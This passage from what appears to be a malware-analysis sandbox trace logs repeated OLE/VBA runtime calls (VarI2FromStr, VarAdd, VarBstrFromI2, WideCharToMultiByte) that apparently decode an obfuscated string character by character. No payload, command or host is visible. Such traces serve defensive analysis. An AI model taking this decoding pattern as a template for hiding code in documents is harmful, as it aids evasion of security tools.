lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x37\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.012] GetUserDefaultLCID () returned 0x409 [0047.012] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.012] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.013] GetUserDefaultLCID () returned 0x409 [0047.013] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.013] GetUserDefaultLCID () returned 0x409 [0047.013] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.013] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.014] GetUserDefaultLCID () returned 0x409 [0047.014] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x37\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x5c\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.015] GetUserDefaultLCID () returned 0x409 [0047.015] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.015] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.016] GetUserDefaultLCID () returned 0x409 [0047.016] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x37\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.016] GetUserDefaultLCID () returned 0x409 [0047.016] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.016] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.017] GetUserDefaultLCID () returned 0x409 [0047.017] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.018] GetUserDefaultLCID () returned 0x409 [0047.018] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.018] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.019] GetUserDefaultLCID () returned 0x409 [0047.019] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x34\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.019] GetUserDefaultLCID () returned 0x409 [0047.019] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.019] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.020] GetUserDefaultLCID () returned 0x409 [0047.020] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x5f\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.021] GetUserDefaultLCID () returned 0x409 [0047.021] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.021] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.022] GetUserDefaultLCID () returned 0x409 [0047.022] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x30\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x34\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.022] GetUserDefaultLCID () returned 0x409 [0047.022] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.022] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.023] GetUserDefaultLCID () returned 0x409 [0047.023] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="9", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x39\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.024] GetUserDefaultLCID () returned 0x409 [0047.024] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.024] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.024] GetUserDefaultLCID () returned 0x409 [0047.024] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x5f\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.025] GetUserDefaultLCID () returned 0x409 [0047.025] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.025] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.025] GetUserDefaultLCID () returned 0x409 [0047.025] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.026] GetUserDefaultLCID () returned 0x409 [0047.026] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.026] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.026] GetUserDefaultLCID () returned 0x409 [0047.026] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x30\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.027] GetUserDefaultLCID () returned 0x409 [0047.027] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.027] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.027] GetUserDefaultLCID () returned 0x409 [0047.028] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x37\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x5b\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.028] GetUserDefaultLCID () returned 0x409 [0047.028] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.028] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.029] GetUserDefaultLCID () returned 0x409 [0047.029] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x34\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.029] GetUserDefaultLCID () returned 0x409 [0047.029] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.029] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.030] GetUserDefaultLCID () returned 0x409 [0047.030] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x37\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.030] GetUserDefaultLCID () returned 0x409 [0047.030] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.030] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.031] GetUserDefaultLCID () returned 0x409 [0047.031] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x30\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.031] GetUserDefaultLCID () returned 0x409 [0047.031] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.031] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.032] GetUserDefaultLCID () returned 0x409 [0047.032] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.032] GetUserDefaultLCID () returned 0x409 [0047.032] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.032] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.033] GetUserDefaultLCID () returned 0x409 [0047.033] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x30\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.033] GetUserDefaultLCID () returned 0x409 [0047.033] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.033] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.034] GetUserDefaultLCID () returned 0x409 [0047.034] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="6", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x36\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.034] GetUserDefaultLCID () returned 0x409 [0047.034] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.034] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.035] GetUserDefaultLCID () returned 0x409 [0047.035] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.035] GetUserDefaultLCID () returned 0x409 [0047.035] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.036] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.036] GetUserDefaultLCID () returned 0x409 [0047.037] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x30\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.037] GetUserDefaultLCID () returned 0x409 [0047.037] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.037] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.038] GetUserDefaultLCID () returned 0x409 [0047.038] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x5f\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.038] GetUserDefaultLCID () returned 0x409 [0047.038] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.038] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.039] GetUserDefaultLCID () returned 0x409 [0047.039] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x32\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.040] GetUserDefaultLCID () returned 0x409 [0047.040] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.040] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.041] GetUserDefaultLCID () returned 0x409 [0047.041] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.041] GetUserDefaultLCID () returned 0x409 [0047.041] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.041] VarAdd (in: pvarLeft=0x80f6620, pvarRight=0x80f6638, pvarResult=0x80f6608 | out: pvarResult=0x80f6608) returned 0x0 [0047.043] GetUserDefaultLCID () returned 0x409 [0047.043] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x34\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x34\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.043] GetUserDefaultLCID () returned 0x409 [0047.043] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.043] VarAdd (in: 